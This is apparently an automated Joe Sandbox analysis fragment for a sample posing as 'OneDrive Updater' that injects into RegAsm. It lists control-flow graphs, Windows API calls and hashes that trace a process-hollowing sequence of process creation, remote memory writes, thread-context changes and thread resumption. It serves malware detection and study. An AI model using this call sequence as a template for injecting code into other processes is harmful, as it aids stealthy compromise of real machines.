144 e82c10-e82c48 ResumeThread 139->144 145 e82c4a-e82c50 144->145 146 e82c51-e82c66 144->146 145->146 146->147 148 e82c68-e82c76 146->148 147->119 149 e82c7c-e82c85 148->149 150 e82e30-e82e4f 148->150 149->150
                                    APIs
                                      • Part of subcall function 00E81EC8: CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00E82FA4
                                      • Part of subcall function 00E81ED4: Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,00E82A1C), ref: 00E83103
                                      • Part of subcall function 00E81EE0: ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,00E82A5A,?,00000004,?), ref: 00E831C1
                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 00E82B1F
                                    • ResumeThread.KERNELBASE(?), ref: 00E82C34
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1792660253.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_e80000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: ProcessThread$AllocContextCreateMemoryReadResumeVirtualWow64
                                    • String ID:
                                    • API String ID: 2498194165-0
                                    • Opcode ID: 0556a85f2044fa2e493d1d99c4561b8dd682550087ab5965c1626a97e309a6e8
                                    • Instruction ID: 10ad2b133a94253d2120f5338c1b20384120fad3a9819965ce61dd14902a7c87
                                    • Opcode Fuzzy Hash: 0556a85f2044fa2e493d1d99c4561b8dd682550087ab5965c1626a97e309a6e8
                                    • Instruction Fuzzy Hash: 03D19E70E002198BDB14EFA9C850BAEBBF6AF84304F248559D50DBB395DF349D46CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 156 e82e5c-e82e5d 157 e82e5f-e82ee1 156->157 158 e82df5-e82dff call e81ac0 156->158 159 e82ee9-e82ef0 157->159 160 e82ee3-e82ee6 157->160 165 e82c8a-e82dc6 158->165 166 e82e05-e82e09 158->166 162 e82efb-e82f11 159->162 163 e82ef2-e82ef8 159->163 160->159 167 e82f1c-e82fb7 CreateProcessW 162->167 168 e82f13-e82f19 162->168 163->162 165->166 219 e82dc8-e82dca 165->219 171 e82fb9-e82fbf 167->171 172 e82fc0-e83034 167->172 168->167 171->172 186 e83046-e8304d 172->186 187 e83036-e8303c 172->187 188 e8304f-e8305e 186->188 189 e83064 186->189 187->186 188->189 193 e83065 189->193 193->193 220 e82dd4-e82df2 219->220 220->158
                                    APIs
                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00E82FA4
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1792660253.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_e80000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: b1dc27e40e321cc2c3576ae5719edb6f5078e0f84199be94a2f45d468ea33363
                                    • Instruction ID: cc81f8811db281d84645b5013fecb4dd00bc98ce0586e08089d5e65862a1c118
                                    • Opcode Fuzzy Hash: b1dc27e40e321cc2c3576ae5719edb6f5078e0f84199be94a2f45d468ea33363
                                    • Instruction Fuzzy Hash: 84514571901229DFDB24DFA9C940BDDBBB2BF48304F14809AE90CB7250D7759A84CF51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 222 e81ec8-e82ee1 224 e82ee9-e82ef0 222->224 225 e82ee3-e82ee6 222->225 226 e82efb-e82f11 224->226 227 e82ef2-e82ef8 224->227 225->224 228 e82f1c-e82fb7 CreateProcessW 226->228 229 e82f13-e82f19 226->229 227->226 231 e82fb9-e82fbf 228->231 232 e82fc0-e83034 228->232 229->228 231->232 240 e83046-e8304d 232->240 241 e83036-e8303c 232->241 242 e8304f-e8305e 240->242 243 e83064 240->243 241->240 242->243 245 e83065 243->245 245->245
                                    APIs
                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00E82FA4
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1792660253.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_e80000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 485102b3a61f94c1556bdd2c7598c89bcb3a71a0926b845aeaf08ffbeb73cad8
                                    • Instruction ID: e280edd42dc046f04a308c51aac095f8938305d4703e954818fd7457dca423cb
                                    • Opcode Fuzzy Hash: 485102b3a61f94c1556bdd2c7598c89bcb3a71a0926b845aeaf08ffbeb73cad8
                                    • Instruction Fuzzy Hash: 6251E371901319DFDB24DFA9C940BDDBBB5BF49304F14809AE508BB250D775AA84CF51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 246 e81ac0-e83256 248 e83258-e8325e 246->248 249 e83260-e83299 WriteProcessMemory 246->249 248->249 250 e8329b-e832a1 249->250 251 e832a2-e832c3 249->251 250->251
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?,?,?,?,00000000,00000000,?,00E82DFD,?,?,00000000), ref: 00E8328C
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1792660253.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_e80000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 2be24ab0e39dbf4370dfa1f3bedb6bd2981d604fbebc32aa9abe316b5754b8a0
                                    • Instruction ID: 149eaf31a270bf98e6d7e33736d44dde3e0c15f8c4ce5e0bede1a0ac6a98ffb7
                                    • Opcode Fuzzy Hash: 2be24ab0e39dbf4370dfa1f3bedb6bd2981d604fbebc32aa9abe316b5754b8a0
                                    • Instruction Fuzzy Hash: D421F8B1900349DFCB10DFAAD845BDEBBF4FB48314F108429E518B7250D374A944CBA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 253 e81ee0-e831ce ReadProcessMemory 256 e831d0-e831d6 253->256 257 e831d7-e831f8 253->257 256->257
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,00E82A5A,?,00000004,?), ref: 00E831C1
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1792660253.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_e80000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: f11b1b54d6041ab8494f52b1894dc54b483d0c75af2c5b30c5059cc7d5740317
                                    • Instruction ID: 91bf79587df97c69c789924de4de5e1944f5280039aa7d4e17bdbc9f1ba506b7
                                    • Opcode Fuzzy Hash: f11b1b54d6041ab8494f52b1894dc54b483d0c75af2c5b30c5059cc7d5740317
                                    • Instruction Fuzzy Hash: C021E2B5901259DFCB10DF9AD884ADEBBF4FB48714F10842AE958A7250C378AA44CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 259 e81acc-e830d8 261 e830da-e830e2 259->261 262 e830e4-e83110 Wow64SetThreadContext 259->262 261->262 263 e83119-e8313a 262->263 264 e83112-e83118 262->264 264->263
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,00E82A1C), ref: 00E83103
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1792660253.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_e80000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: b5ca37cb840331151af13e970c6c10e7768c93eabaf19c68526295cd76a8554d
                                    • Instruction ID: 8063eadf9060128e4d50b506f11b2570f1860fc3c77520eb8da9a317313a20c9
                                    • Opcode Fuzzy Hash: b5ca37cb840331151af13e970c6c10e7768c93eabaf19c68526295cd76a8554d
                                    • Instruction Fuzzy Hash: 501129B19007498FCB10DFAAC845BDEFBF4EB88714F14802AD458B7240D7789544CFA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 266 e81ed4-e830d8 268 e830da-e830e2 266->268 269 e830e4-e83110 Wow64SetThreadContext 266->269 268->269 270 e83119-e8313a 269->270 271 e83112-e83118 269->271 271->270
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,00E82A1C), ref: 00E83103
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1792660253.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_e80000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 1365c3684cc18fa6b95eecd24b3f30c707cdf46297a59575fa5d984c0f9105b1
                                    • Instruction ID: cee7cafdd3633229ceae46cbf123f08fd8a492571fb97d6671e71a9869af861e
                                    • Opcode Fuzzy Hash: 1365c3684cc18fa6b95eecd24b3f30c707cdf46297a59575fa5d984c0f9105b1
                                    • Instruction Fuzzy Hash: C91129B19007498FCB10DFAAC845BDEFBF4EB88714F14802AD458B7240D3789544CFA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 273 e8314a-e831ce ReadProcessMemory 275 e831d0-e831d6 273->275 276 e831d7-e831f8 273->276 275->276
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,00E82A5A,?,00000004,?), ref: 00E831C1
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1792660253.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_e80000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 2fdb6b97bf1e05a2db9d2e214adf9c88db29db69c6c1cdafc15ca76a06ec9c83
                                    • Instruction ID: 010e4a674df0a4dc2397e8d80da83ab1c14680b9ed9d1982f861e082b0ea4175
                                    • Opcode Fuzzy Hash: 2fdb6b97bf1e05a2db9d2e214adf9c88db29db69c6c1cdafc15ca76a06ec9c83
                                    • Instruction Fuzzy Hash: BA2113B5800259DFCB10CF9AC884ADEBBF4FF48310F10842AE958A7250C378A644CFA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 278 e83208-e83209 279 e8320b-e8320e 278->279 280 e831a1-e831ce ReadProcessMemory 278->280 281 e831d0-e831d6 280->281 282 e831d7-e831f8 280->282 281->282
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,00E82A5A,?,00000004,?), ref: 00E831C1
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1792660253.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_e80000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 15d23d206f837dc47f1e78c01d48573c4553e7b6d44c27c7132f1ed12c93f0b5
                                    • Instruction ID: cdfa3c824b2a11d6d07b4338dabc341d600c3f1673dd6a6c8eaff257d181587e
                                    • Opcode Fuzzy Hash: 15d23d206f837dc47f1e78c01d48573c4553e7b6d44c27c7132f1ed12c93f0b5
                                    • Instruction Fuzzy Hash: 84F0C272801208DFEB119FA5C808BDDFBF4EB48725F18C41AE588A6560C3785544DF25

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 335 ddd3c8-ddd3da 336 ddd46e-ddd475 335->336 337 ddd3e0 335->337 338 ddd3e2-ddd3ee 336->338 337->338 339 ddd47a-ddd47f 338->339 340 ddd3f4-ddd416 338->340 339->340 342 ddd418-ddd436 340->342 343 ddd484-ddd499 340->343 346 ddd43e-ddd44e 342->346 347 ddd450-ddd458 343->347 346->347 348 ddd4a6 346->348 349 ddd49b-ddd4a4 347->349 350 ddd45a-ddd46b 347->350 349->350
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1791256125.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_ddd000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 82c7134d0d177b64ddd0442e7d046efdae64ca75a35b049e7be7f1056321098c
                                    • Instruction ID: 2ffb053f71b1af727b0f21348a0ad750a32ff47545c23b00d9464be4ebcd4b21
                                    • Opcode Fuzzy Hash: 82c7134d0d177b64ddd0442e7d046efdae64ca75a35b049e7be7f1056321098c
                                    • Instruction Fuzzy Hash: 41212571500200DFDF15DF14D9C4B26BF66FB98324F24C56AE9090B356C336E856C6B2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 352 ddd3c3-ddd3da 353 ddd46e-ddd475 352->353 354 ddd3e0 352->354 355 ddd3e2-ddd3ee 353->355 354->355 356 ddd47a-ddd47f 355->356 357 ddd3f4-ddd416 355->357 356->357 359 ddd418-ddd436 357->359 360 ddd484-ddd499 357->360 363 ddd43e-ddd44e 359->363 364 ddd450-ddd458 360->364 363->364 365 ddd4a6 363->365 366 ddd49b-ddd4a4 364->366 367 ddd45a-ddd46b 364->367 366->367
                                    Memory Dump Source
                                    • Source File: 0000001F.00000002.1791256125.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_31_2_ddd000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                    • Instruction ID: d5761c1b6089710e1b43676af17201182662b5090a96fd2c3748ff63bfb0f4f5
                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                    • Instruction Fuzzy Hash: 4F11B176504240DFDF16CF10D5C4B16BF72FB94324F28C6AAD8090B656C336E85ACBA1

                                    Execution Graph

                                    Execution Coverage:7.7%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:88
                                    Total number of Limit Nodes:8
                                    execution_graph 13515 5494668 13516 5494676 13515->13516 13521 5496de0 13516->13521 13519 5494704 13522 5496e05 13521->13522 13530 5496edf 13522->13530 13534 5496ef0 13522->13534 13523 54946e9 13526 549421c 13523->13526 13527 5494227 13526->13527 13542 5498560 13527->13542 13529 5498806 13529->13519 13532 5496f17 13530->13532 13531 5496ff4 13531->13531 13532->13531 13538 5496414 13532->13538 13536 5496f17 13534->13536 13535 5496ff4 13535->13535 13536->13535 13537 5496414 CreateActCtxA 13536->13537 13537->13535 13539 5497370 CreateActCtxA 13538->13539 13541 5497433 13539->13541 13543 549856b 13542->13543 13546 5498580 13543->13546 13545 54988dd 13545->13529 13547 549858b 13546->13547 13550 54985b0 13547->13550 13549 54989ba 13549->13545 13551 54985bb 13550->13551 13554 54985e0 13551->13554 13553 5498aad 13553->13549 13555 54985eb 13554->13555 13557 5499e93 13555->13557 13560 549bed1 13555->13560 13556 5499ed1 13556->13553 13557->13556 13566 549df70 13557->13566 13561 549beda 13560->13561 13563 549be91 13560->13563 13570 549bf08 13561->13570 13573 549bef8 13561->13573 13562 549bee6 13562->13557 13563->13557 13567 549df91 13566->13567 13568 549dfb5 13567->13568 13596 549e120 13567->13596 13568->13556 13576 549bff0 13570->13576 13571 549bf17 13571->13562 13574 549bf17 13573->13574 13575 549bff0 2 API calls 13573->13575 13574->13562 13575->13574 13577 549c011 13576->13577 13578 549c034 13576->13578 13577->13578 13584 549c689 13577->13584 13588 549c698 13577->13588 13578->13571 13579 549c02c 13579->13578 13580 549c238 GetModuleHandleW 13579->13580 13581 549c265 13580->13581 13581->13571 13585 549c698 13584->13585 13586 549c6d1 13585->13586 13592 549c294 13585->13592 13586->13579 13589 549c6ac 13588->13589 13590 549c6d1 13589->13590 13591 549c294 LoadLibraryExW 13589->13591 13590->13579 13591->13590 13593 549c878 LoadLibraryExW 13592->13593 13595 549c8f1 13593->13595 13595->13586 13597 549e12d 13596->13597 13598 549e166 13597->13598 13600 549c464 13597->13600 13598->13568 13601 549c46f 13600->13601 13602 549e1d8 13601->13602 13604 549c498 13601->13604 13605 549c4a3 13604->13605 13606 54985e0 3 API calls 13605->13606 13607 549e247 13606->13607 13610 549e2c0 13607->13610 13608 549e256 13608->13602 13611 549e2ee 13610->13611 13612 549e3ba KiUserCallbackDispatcher 13611->13612 13613 549e3bf 13611->13613 13612->13613 13614 5496540 13615 5496586 13614->13615 13619 549670f 13615->13619 13626 5496720 13615->13626 13616 5496673 13620 549677a DuplicateHandle 13619->13620 13621 5496713 13619->13621 13624 549681e 13620->13624 13629 549611c 13621->13629 13624->13616 13627 549611c DuplicateHandle 13626->13627 13628 549674e 13627->13628 13628->13616 13630 5496788 DuplicateHandle 13629->13630 13632 549674e 13630->13632 13632->13616

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 558 549bff0-549c00f 559 549c03b-549c03f 558->559 560 549c011-549c01e call 549af60 558->560 561 549c041-549c04b 559->561 562 549c053-549c094 559->562 567 549c020 560->567 568 549c034 560->568 561->562 569 549c0a1-549c0af 562->569 570 549c096-549c09e 562->570 613 549c026 call 549c689 567->613 614 549c026 call 549c698 567->614 568->559 571 549c0b1-549c0b6 569->571 572 549c0d3-549c0d5 569->572 570->569 575 549c0b8-549c0bf call 549af6c 571->575 576 549c0c1 571->576 574 549c0d8-549c0df 572->574 573 549c02c-549c02e 573->568 577 549c170-549c230 573->577 578 549c0ec-549c0f3 574->578 579 549c0e1-549c0e9 574->579 581 549c0c3-549c0d1 575->581 576->581 608 549c238-549c263 GetModuleHandleW 577->608 609 549c232-549c235 577->609 582 549c100-549c109 call 549af7c 578->582 583 549c0f5-549c0fd 578->583 579->578 581->574 589 549c10b-549c113 582->589 590 549c116-549c11b 582->590 583->582 589->590 591 549c139-549c146 590->591 592 549c11d-549c124 590->592 598 549c169-549c16f 591->598 599 549c148-549c166 591->599 592->591 594 549c126-549c136 call 549af8c call 549af9c 592->594 594->591 599->598 610 549c26c-549c280 608->610 611 549c265-549c26b 608->611 609->608 611->610 613->573 614->573
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0549C256
                                    Memory Dump Source
                                    • Source File: 00000020.00000002.1856239026.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_32_2_5490000_RegAsm.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 9e00292232092fd69575bf5cca9f655b27efed310d8392c1d5864d123922ff47
                                    • Instruction ID: 2d1def456d70e2f18fb21169288ad3280384b335425fc342b5643b4c5f3a3c83
                                    • Opcode Fuzzy Hash: 9e00292232092fd69575bf5cca9f655b27efed310d8392c1d5864d123922ff47
                                    • Instruction Fuzzy Hash: 5F8136B0A00B058FDB28DF69C5867AABBF2BF48204F00896ED086D7B50D775E845CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 615 549670f-5496711 616 549677a-5496781 615->616 617 5496713-5496749 call 549611c 615->617 618 54967ea-549681c DuplicateHandle 616->618 619 5496783-54967e8 616->619 625 549674e-5496774 617->625 623 549681e-5496824 618->623 624 5496825-5496842 618->624 619->618 623->624
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0549674E,?,?,?,?,?), ref: 0549680F
                                    Memory Dump Source
                                    • Source File: 00000020.00000002.1856239026.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_32_2_5490000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: af1f80e311b28a3b68574cc6149d3859ec9206f5ff069e3ec21cf4bbc46b8331
                                    • Instruction ID: ee0b0dcc716f65dad3dec46778a7974089f3e40fc234299383d838b73af53e70
                                    • Opcode Fuzzy Hash: af1f80e311b28a3b68574cc6149d3859ec9206f5ff069e3ec21cf4bbc46b8331
                                    • Instruction Fuzzy Hash: 5841597A900248AFCF01CF99C845AEEBFF5EF49310F19805AE954A7361D7359914CFA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 630 5496414-5497431 CreateActCtxA 633 549743a-5497494 630->633 634 5497433-5497439 630->634 641 54974a3-54974a7 633->641 642 5497496-5497499 633->642 634->633 643 54974a9-54974b5 641->643 644 54974b8 641->644 642->641 643->644 646 54974b9 644->646 646->646
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 05497421
                                    Memory Dump Source
                                    • Source File: 00000020.00000002.1856239026.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_32_2_5490000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: bb3231a1ee9d3c90fd7839fe90e3049019e71188c5e3ce1c9c44dadb691365f6
                                    • Instruction ID: 558aabb48268cfa3ad62f35ce6d59aeef745827d3572857a423ee7d8dd1699c0
                                    • Opcode Fuzzy Hash: bb3231a1ee9d3c90fd7839fe90e3049019e71188c5e3ce1c9c44dadb691365f6
                                    • Instruction Fuzzy Hash: AE41D0B0C00619DADF28DFA9C844BDEBBB5BF45304F2480AAD408AB265DB756985CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 647 5497364-5497431 CreateActCtxA 649 549743a-5497494 647->649 650 5497433-5497439 647->650 657 54974a3-54974a7 649->657 658 5497496-5497499 649->658 650->649 659 54974a9-54974b5 657->659 660 54974b8 657->660 658->657 659->660 662 54974b9 660->662 662->662
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 05497421
                                    Memory Dump Source
                                    • Source File: 00000020.00000002.1856239026.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_32_2_5490000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: eb31fe9e38511f7d4617befb9a1f9c03bce0886746055d1b396bad7898b24500
                                    • Instruction ID: 599e795bf0b8c69c3c3e7331c4173dbd4549e5632026bb1c73b07dcecd2a47a4
                                    • Opcode Fuzzy Hash: eb31fe9e38511f7d4617befb9a1f9c03bce0886746055d1b396bad7898b24500
                                    • Instruction Fuzzy Hash: E541F2B0C00619DEDF24CFA9C944BDEBBB5BF49304F2480AAD408AB261DB756949CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 663 549611c-549681c DuplicateHandle 666 549681e-5496824 663->666 667 5496825-5496842 663->667 666->667
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0549674E,?,?,?,?,?), ref: 0549680F
                                    Memory Dump Source
                                    • Source File: 00000020.00000002.1856239026.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_32_2_5490000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: e162350d6b356776c897b8436ab3e306873dd644ecdda72cdb6eb433459f334f
                                    • Instruction ID: 06a384af45139b0aa272dc600f1b600bb611c16d192a4a4d141db7a7e24d0716
                                    • Opcode Fuzzy Hash: e162350d6b356776c897b8436ab3e306873dd644ecdda72cdb6eb433459f334f
                                    • Instruction Fuzzy Hash: 7A21E4B5900248DFDB10CF9AD984AEEBFF4FB48320F14845AE958A7310D378A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 670 549c294-549c8b8 672 549c8ba-549c8bd 670->672 673 549c8c0-549c8ef LoadLibraryExW 670->673 672->673 674 549c8f8-549c915 673->674 675 549c8f1-549c8f7 673->675 675->674
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0549C6D1,00000800,00000000,00000000), ref: 0549C8E2
                                    Memory Dump Source
                                    • Source File: 00000020.00000002.1856239026.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_32_2_5490000_RegAsm.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 06701690a0b270a7199f4d5d09e403082364dd282e15fd329f85629082c01150
                                    • Instruction ID: 86b28f16f9cc4b261c3cc4769e89085919fa42da1b39a75836258566ba0db852
                                    • Opcode Fuzzy Hash: 06701690a0b270a7199f4d5d09e403082364dd282e15fd329f85629082c01150
                                    • Instruction Fuzzy Hash: F61114B6D003498FCB14DF9AD484ADEFBF4EB88311F10842AD419A7310C774A945CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 678 549c870-549c8b8 679 549c8ba-549c8bd 678->679 680 549c8c0-549c8ef LoadLibraryExW 678->680 679->680 681 549c8f8-549c915 680->681 682 549c8f1-549c8f7 680->682 682->681
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0549C6D1,00000800,00000000,00000000), ref: 0549C8E2
                                    Memory Dump Source
                                    • Source File: 00000020.00000002.1856239026.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_32_2_5490000_RegAsm.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: d1898a6119c9427eea3c0c53440a153b62822d30cc1310b91cbad0373dba2a70
                                    • Instruction ID: 9729a2f148df610c8e2ec2e2375098dc2a93808e98398e4bbcf46123c9980d12
                                    • Opcode Fuzzy Hash: d1898a6119c9427eea3c0c53440a153b62822d30cc1310b91cbad0373dba2a70
                                    • Instruction Fuzzy Hash: BA11EFB6D003498FDB14CFAAD585ADEFBF4AB88311F14842ED519A7310C378A945CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 685 549c1f0-549c230 686 549c238-549c263 GetModuleHandleW 685->686 687 549c232-549c235 685->687 688 549c26c-549c280 686->688 689 549c265-549c26b 686->689 687->686 689->688
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0549C256
                                    Memory Dump Source
                                    • Source File: 00000020.00000002.1856239026.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_32_2_5490000_RegAsm.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 4571136aa3970a8344bfd7e69eb03112796a8fac9ad1a88be9a7aa395e57b772
                                    • Instruction ID: 09a1260f1c6b43bd52bfa094f1ae8ce661a5398f228f1757af7cd7d1c6428a86
                                    • Opcode Fuzzy Hash: 4571136aa3970a8344bfd7e69eb03112796a8fac9ad1a88be9a7aa395e57b772
                                    • Instruction Fuzzy Hash: 5F1110B6C002498FCB14CF9AC444ADEFBF4AB88324F10846AD429B7310C379A545CFA1
                                    Memory Dump Source
                                    • Source File: 00000020.00000002.1823867595.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_32_2_163d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d046ca31df840b09d18b930cb40e92013b3b06826528db30e218db3a1a56874e
                                    • Instruction ID: 60c69a70c27dbe3a78a048c188180cfcf0f119b5c19b4e8bccb6e01195df3e2a
                                    • Opcode Fuzzy Hash: d046ca31df840b09d18b930cb40e92013b3b06826528db30e218db3a1a56874e
